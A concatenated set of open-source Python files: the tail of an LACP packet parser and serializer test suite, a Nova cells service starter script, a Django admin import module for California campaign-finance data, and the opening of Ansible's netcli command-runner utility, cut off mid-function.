self.l.actor_state_collecting)
eq_(self.actor_state_distributing,
self.l.actor_state_distributing)
eq_(self.actor_state_defaulted, self.l.actor_state_defaulted)
eq_(self.actor_state_expired, self.l.actor_state_expired)
eq_(self.actor_state, self.l._actor_state)
eq_(self.partner_tag, self.l._partner_tag)
eq_(self.partner_length, self.l._partner_length)
eq_(self.partner_system_priority,
self.l.partner_system_priority)
eq_(self.partner_system, self.l.partner_system)
eq_(self.partner_key, self.l.partner_key)
eq_(self.partner_port_priority, self.l.partner_port_priority)
eq_(self.partner_port, self.l.partner_port)
eq_(self.partner_state_activity, self.l.partner_state_activity)
eq_(self.partner_state_timeout, self.l.partner_state_timeout)
eq_(self.partner_state_aggregation,
self.l.partner_state_aggregation)
eq_(self.partner_state_synchronization,
self.l.partner_state_synchronization)
eq_(self.partner_state_collecting,
self.l.partner_state_collecting)
eq_(self.partner_state_distributing,
self.l.partner_state_distributing)
eq_(self.partner_state_defaulted,
self.l.partner_state_defaulted)
eq_(self.partner_state_expired, self.l.partner_state_expired)
eq_(self.partner_state, self.l._partner_state)
eq_(self.collector_tag, self.l._collector_tag)
eq_(self.collector_length, self.l._collector_length)
eq_(self.collector_max_delay, self.l.collector_max_delay)
eq_(self.terminator_tag, self.l._terminator_tag)
eq_(self.terminator_length, self.l._terminator_length)
def test_parser(self):
_res = self.l.parser(self.buf)
if type(_res) is tuple:
res = _res[0]
else:
res = _res
eq_(res._subtype, self.subtype)
eq_(res.version, self.version)
eq_(res._actor_tag, self.actor_tag)
eq_(res._actor_length, self.actor_length)
eq_(res.actor_system_priority, self.actor_system_priority)
eq_(res.actor_system, self.actor_system)
eq_(res.actor_key, self.actor_key)
eq_(res.actor_port_priority, self.actor_port_priority)
eq_(res.actor_port, self.actor_port)
eq_(res.actor_state_activity, self.actor_state_activity)
eq_(res.actor_state_timeout, self.actor_state_timeout)
eq_(res.actor_state_aggregation, self.actor_state_aggregation)
eq_(res.actor_state_synchronization,
self.actor_state_synchronization)
eq_(res.actor_state_collecting, self.actor_state_collecting)
eq_(res.actor_state_distributing, self.actor_state_distributing)
eq_(res.actor_state_defaulted, self.actor_state_defaulted)
eq_(res.actor_state_expired, self.actor_state_expired)
eq_(res._actor_state, self.actor_state)
eq_(res._partner_tag, self.partner_tag)
eq_(res._partner_length, self.partner_length)
eq_(res.partner_system_priority, self.partner_system_priority)
eq_(res.partner_system, self.partner_system)
eq_(res.partner_key, self.partner_key)
eq_(res.partner_port_priority, self.partner_port_priority)
eq_(res.partner_port, self.partner_port)
eq_(res.partner_state_activity, self.partner_state_activity)
eq_(res.partner_state_timeout, self.partner_state_timeout)
eq_(res.partner_state_aggregation,
self.partner_state_aggregation)
eq_(res.partner_state_synchronization,
self.partner_state_synchronization)
eq_(res.partner_state_collecting, self.partner_state_collecting)
eq_(res.partner_state_distributing,
self.partner_state_distributing)
eq_(res.partner_state_defaulted, self.partner_state_defaulted)
eq_(res.partner_state_expired, self.partner_state_expired)
eq_(res._partner_state, self.partner_state)
eq_(res._collector_tag, self.collector_tag)
eq_(res._collector_length, self.collector_length)
eq_(res.collector_max_delay, self.collector_max_delay)
eq_(res._terminator_tag, self.terminator_tag)
eq_(res._terminator_length, self.terminator_length)
def test_serialize(self):
data = bytearray()
prev = None
buf = self.l.serialize(data, prev)
offset = 0
head_res = unpack_from(self.head_fmt, buf, offset)
offset += self.head_len
act_res = unpack_from(self.act_fmt, buf, offset)
offset += self.act_len
prt_res = unpack_from(self.prt_fmt, buf, offset)
offset += self.prt_len
col_res = unpack_from(self.col_fmt, buf, offset)
offset += self.col_len
trm_res = unpack_from(self.trm_fmt, buf, offset)
eq_(head_res[0], self.subtype)
eq_(head_res[1], self.version)
eq_(act_res[0], self.actor_tag)
eq_(act_res[1], self.actor_length)
eq_(act_res[2], self.actor_system_priority)
eq_(act_res[3], addrconv.mac.text_to_bin(self.actor_system))
eq_(act_res[4], self.actor_key)
eq_(act_res[5], self.actor_port_priority)
eq_(act_res[6], self.actor_port)
eq_(act_res[7], self.actor_state)
eq_(prt_res[0], self.partner_tag)
eq_(prt_res[1], self.partner_length)
eq_(prt_res[2], self.partner_system_priority)
eq_(prt_res[3], addrconv.mac.text_to_bin(self.partner_system))
eq_(prt_res[4], self.partner_key)
eq_(prt_res[5], self.partner_port_priority)
eq_(prt_res[6], self.partner_port)
eq_(prt_res[7], self.partner_state)
eq_(col_res[0], self.collector_tag)
eq_(col_res[1], self.collector_length)
eq_(col_res[2], self.collector_max_delay)
eq_(trm_res[0], self.terminator_tag)
eq_(trm_res[1], self.terminator_length)
def _build_lacp(self):
ethertype = ether.ETH_TYPE_SLOW
dst = SLOW_PROTOCOL_MULTICAST
e = ethernet(dst, self.actor_system, ethertype)
p = Packet()
p.add_protocol(e)
p.add_protocol(self.l)
p.serialize()
return p
def test_build_lacp(self):
p = self._build_lacp()
e = self.find_protocol(p, "ethernet")
ok_(e)
eq_(e.ethertype, ether.ETH_TYPE_SLOW)
l = self.find_protocol(p, "lacp")
ok_(l)
eq_(l._subtype, self.subtype)
eq_(l.version, self.version)
eq_(l._actor_tag, self.actor_tag)
eq_(l._actor_length, self.actor_length)
eq_(l.actor_system_priority, self.actor_system_priority)
eq_(l.actor_system, self.actor_system)
eq_(l.actor_key, self.actor_key)
eq_(l.actor_port_priority, self.actor_port_priority)
eq_(l.actor_port, self.actor_port)
eq_(l.actor_state_activity, self.actor_state_activity)
eq_(l.actor_state_timeout, self.actor_state_timeout)
eq_(l.actor_state_aggregation, self.actor_state_aggregation)
eq_(l.actor_state_synchronization,
self.actor_state_synchronization)
eq_(l.actor_state_collecting, self.actor_state_collecting)
eq_(l.actor_state_distributing, self.actor_state_distributing)
eq_(l.actor_state_defaulted, self.actor_state_defaulted)
eq_(l.actor_state_expired, self.actor_state_expired)
eq_(l._actor_state, self.actor_state)
eq_(l._partner_tag, self.partner_tag)
eq_(l._partner_length, self.partner_length)
eq_(l.partner_system_priority, self.partner_system_priority)
eq_(l.partner_system, self.partner_system)
eq_(l.partner_key, self.partner_key)
eq_(l.partner_port_priority, self.partner_port_priority)
eq_(l.partner_port, self.partner_port)
eq_(l.partner_state_activity, self.partner_state_activity)
eq_(l.partner_state_timeout, self.partner_state_timeout)
eq_(l.partner_state_aggregation, self.partner_state_aggregation)
eq_(l.partner_state_synchronization,
self.partner_state_synchronization)
eq_(l.partner_state_collecting, self.partner_state_collecting)
eq_(l.partner_state_distributing,
self.partner_state_distributing)
eq_(l.partner_state_defaulted, self.partner_state_defaulted)
eq_(l.partner_state_expired, self.partner_state_expired)
eq_(l._partner_state, self.partner_state)
eq_(l._collector_tag, self.collector_tag)
eq_(l._collector_length, self.collector_length)
eq_(l.collector_max_delay, self.collector_max_delay)
eq_(l._terminator_tag, self.terminator_tag)
eq_(l._terminator_length, self.terminator_length)
@raises(Exception)
def test_malformed_lacp(self):
m_short_buf = self.buf[1:self.length]
slow.parser(m_short_buf)
@raises(Exception)
def test_invalid_subtype(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.subtype = 0xff
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_version(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.version = 0xff
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_actor_tag(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.actor_tag = 0x04
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_actor_length(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.actor_length = 50
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_partner_tag(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.partner_tag = 0x01
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_partner_length(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.partner_length = 0
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_collector_tag(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.collector_tag = 0x00
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_collector_length(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.collector_length = 20
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_terminator_tag(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.terminator_tag = 0x04
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_terminator_length(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.terminator_length = self.trm_len
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_actor_state_activity(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
2,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_actor_state_timeout(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
2,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_actor_state_aggregation(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
2,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_actor_state_synchronization(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
2,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_actor_state_collecting(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
2,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_actor_state_distributing(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
2,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_actor_state_defaulted(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
2,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_actor_state_expired(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
2,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_activity(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
-1,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_timeout(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
-1,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_aggregation(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
-1,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_synchronization(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
-1,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_collecting(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
-1,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_distributing(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
-1,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_defaulted(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
-1,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_expired(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
-1,
self.collector_max_delay)
l.serialize()
def test_json(self):
jsondict = self.l.to_jsondict()
l = lacp.from_jsondict(jsondict['lacp'])
eq_(str(self.l), str(l))
|
apache-2.0
|
CEG-FYP-OpenStack/scheduler
|
nova/cmd/cells.py
|
9
|
1357
|
# Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Starter script for Nova Cells Service."""
import sys
from oslo_log import log as logging
from oslo_reports import guru_meditation_report as gmr
import nova.conf
from nova import config
from nova import objects
from nova import service
from nova import utils
from nova import version
CONF = nova.conf.CONF
def main():
config.parse_args(sys.argv)
logging.setup(CONF, 'nova')
utils.monkey_patch()
objects.register_all()
gmr.TextGuruMeditation.setup_autorun(version)
server = service.Service.create(binary='nova-cells',
topic=CONF.cells.topic,
manager=CONF.cells.manager)
service.serve(server)
service.wait()
|
apache-2.0
|
karkinosw/django-calaccess-raw-data
|
calaccess_raw/admin/__init__.py
|
29
|
4140
|
from calaccess_raw.admin.base import BaseAdmin
from calaccess_raw.admin.campaign import (
CvrSoCdAdmin,
Cvr2SoCdAdmin,
CvrCampaignDisclosureCdAdmin,
Cvr2CampaignDisclosureCdAdmin,
RcptCdAdmin,
Cvr3VerificationInfoCdAdmin,
LoanCdAdmin,
S401CdAdmin,
ExpnCdAdmin,
F495P2CdAdmin,
DebtCdAdmin,
S496CdAdmin,
SpltCdAdmin,
S497CdAdmin,
F501502CdAdmin,
S498CdAdmin,
)
from calaccess_raw.admin.lobbying import (
CvrRegistrationCdAdmin,
Cvr2RegistrationCdAdmin,
CvrLobbyDisclosureCdAdmin,
Cvr2LobbyDisclosureCdAdmin,
LobbyAmendmentsCdAdmin,
F690P2CdAdmin,
LattCdAdmin,
LexpCdAdmin,
LccmCdAdmin,
LothCdAdmin,
LempCdAdmin,
LpayCdAdmin,
)
from calaccess_raw.admin.common import (
FilernameCdAdmin,
FilerFilingsCdAdmin,
FilingsCdAdmin,
SmryCdAdmin,
CvrE530CdAdmin,
TextMemoCdAdmin,
)
from calaccess_raw.admin.other import (
AcronymsCdAdmin,
AddressCdAdmin,
BallotMeasuresCdAdmin,
EfsFilingLogCdAdmin,
FilersCdAdmin,
FilerAcronymsCdAdmin,
FilerAddressCdAdmin,
FilerEthicsClassCdAdmin,
FilerInterestsCdAdmin,
FilerLinksCdAdmin,
FilerStatusTypesCdAdmin,
FilerToFilerTypeCdAdmin,
FilerTypesCdAdmin,
FilerXrefCdAdmin,
FilingPeriodCdAdmin,
GroupTypesCdAdmin,
HeaderCdAdmin,
HdrCdAdmin,
ImageLinksCdAdmin,
LegislativeSessionsCdAdmin,
LobbyingChgLogCdAdmin,
LobbyistContributions1CdAdmin,
LobbyistContributions2CdAdmin,
LobbyistContributions3CdAdmin,
LobbyistEmployer1CdAdmin,
LobbyistEmployer2CdAdmin,
LobbyistEmployer3CdAdmin,
LobbyistEmployerFirms1CdAdmin,
LobbyistEmployerFirms2CdAdmin,
LobbyistEmpLobbyist1CdAdmin,
LobbyistEmpLobbyist2CdAdmin,
LobbyistFirm1CdAdmin,
LobbyistFirm2CdAdmin,
LobbyistFirm3CdAdmin,
LobbyistFirmEmployer1CdAdmin,
LobbyistFirmEmployer2CdAdmin,
LobbyistFirmLobbyist1CdAdmin,
LobbyistFirmLobbyist2CdAdmin,
LookupCodeAdmin,
NamesCdAdmin,
ReceivedFilingsCdAdmin,
ReportsCdAdmin,
)
__all__ = [
'BaseAdmin',
'CvrSoCdAdmin',
'Cvr2SoCdAdmin',
'CvrCampaignDisclosureCdAdmin',
'Cvr2CampaignDisclosureCdAdmin',
'RcptCdAdmin',
'Cvr3VerificationInfoCdAdmin',
'LoanCdAdmin',
'S401CdAdmin',
'ExpnCdAdmin',
'F495P2CdAdmin',
'DebtCdAdmin',
'S496CdAdmin',
'SpltCdAdmin',
'S497CdAdmin',
'F501502CdAdmin',
'S498CdAdmin',
'CvrRegistrationCdAdmin',
'Cvr2RegistrationCdAdmin',
'CvrLobbyDisclosureCdAdmin',
'Cvr2LobbyDisclosureCdAdmin',
'LobbyAmendmentsCdAdmin',
'F690P2CdAdmin',
'LattCdAdmin',
'LexpCdAdmin',
'LccmCdAdmin',
'LothCdAdmin',
'LempCdAdmin',
'LpayCdAdmin',
'FilerFilingsCdAdmin',
'FilingsCdAdmin',
'SmryCdAdmin',
'CvrE530CdAdmin',
'TextMemoCdAdmin',
'AcronymsCdAdmin',
'AddressCdAdmin',
'BallotMeasuresCdAdmin',
'EfsFilingLogCdAdmin',
'FilernameCdAdmin',
'FilersCdAdmin',
'FilerAcronymsCdAdmin',
'FilerAddressCdAdmin',
'FilerEthicsClassCdAdmin',
'FilerInterestsCdAdmin',
'FilerLinksCdAdmin',
'FilerStatusTypesCdAdmin',
'FilerToFilerTypeCdAdmin',
'FilerTypesCdAdmin',
'FilerXrefCdAdmin',
'FilingPeriodCdAdmin',
'GroupTypesCdAdmin',
'HeaderCdAdmin',
'HdrCdAdmin',
'ImageLinksCdAdmin',
'LegislativeSessionsCdAdmin',
'LobbyingChgLogCdAdmin',
'LobbyistContributions1CdAdmin',
'LobbyistContributions2CdAdmin',
'LobbyistContributions3CdAdmin',
'LobbyistEmployer1CdAdmin',
'LobbyistEmployer2CdAdmin',
'LobbyistEmployer3CdAdmin',
'LobbyistEmployerFirms1CdAdmin',
'LobbyistEmployerFirms2CdAdmin',
'LobbyistEmpLobbyist1CdAdmin',
'LobbyistEmpLobbyist2CdAdmin',
'LobbyistFirm1CdAdmin',
'LobbyistFirm2CdAdmin',
'LobbyistFirm3CdAdmin',
'LobbyistFirmEmployer1CdAdmin',
'LobbyistFirmEmployer2CdAdmin',
'LobbyistFirmLobbyist1CdAdmin',
'LobbyistFirmLobbyist2CdAdmin',
'LookupCodeAdmin',
'NamesCdAdmin',
'ReceivedFilingsCdAdmin',
'ReportsCdAdmin',
]
|
mit
|
archf/ansible
|
lib/ansible/module_utils/netcli.py
|
87
|
9650
|
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# Copyright (c) 2015 Peter Sprygada, <[email protected]>
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import re
import shlex
import time
from ansible.module_utils.parsing.convert_bool import BOOLEANS_TRUE, BOOLEANS_FALSE
from ansible.module_utils.six import string_types, text_type
from ansible.module_utils.six.moves import zip
def to_list(val):
if isinstance(val, (list, tuple)):
return list(val)
elif val is not None:
return [val]
else:
return list()
class FailedConditionsError(Exception):
def __init__(self, msg, failed_conditions):
super(FailedConditionsError, self).__init__(msg)
self.failed_conditions = failed_conditions
class FailedConditionalError(Exception):
def __init__(self, msg, failed_conditional):
super(FailedConditionalError, self).__init__(msg)
self.failed_conditional = failed_conditional
class AddCommandError(Exception):
def __init__(self, msg, command):
super(AddCommandError, self).__init__(msg)
self.command = command
class AddConditionError(Exception):
def __init__(self, msg, condition):
super(AddConditionError, self).__init__(msg)
self.condition = condition
class Cli(object):
def __init__(self, connection):
self.connection = connection
self.default_output = connection.default_output or 'text'
self._commands = list()
@property
def commands(self):
return [str(c) for c in self._commands]
def __call__(self, commands, output=None):
objects = list()
for cmd in to_list(commands):
objects.append(self.to_command(cmd, output))
return self.connection.run_commands(objects)
def to_command(self, command, output=None, prompt=None, response=None, **kwargs):
output = output or self.default_output
if isinstance(command, Command):
return command
if isinstance(prompt, string_types):
prompt = re.compile(re.escape(prompt))
return Command(command, output, prompt=prompt, response=response, **kwargs)
def add_commands(self, commands, output=None, **kwargs):
for cmd in commands:
self._commands.append(self.to_command(cmd, output, **kwargs))
def run_commands(self):
responses = self.connection.run_commands(self._commands)
for resp, cmd in zip(responses, self._commands):
cmd.response = resp
# wipe out the commands list to avoid issues if additional
# commands are executed later
self._commands = list()
return responses
class Command(object):
def __init__(self, command, output=None, prompt=None, response=None,
**kwargs):
self.command = command
self.output = output
self.command_string = command
self.prompt = prompt
self.response = response
self.args = kwargs
def __str__(self):
return self.command_string
class CommandRunner(object):
def __init__(self, module):
self.module = module
self.items = list()
self.conditionals = set()
self.commands = list()
self.retries = 10
self.interval = 1
self.match = 'all'
self._default_output = module.connection.default_output
def add_command(self, command, output=None, prompt=None, response=None,
**kwargs):
if command in [str(c) for c in self.commands]:
raise AddCommandError('duplicated command detected', command=command)
cmd = self.module.cli.to_command(command, output=output, prompt=prompt,
response=response, **kwargs)
self.commands.append(cmd)
def get_command(self, command, output=None):
for cmd in self.commands:
if cmd.command == command:
return cmd.response
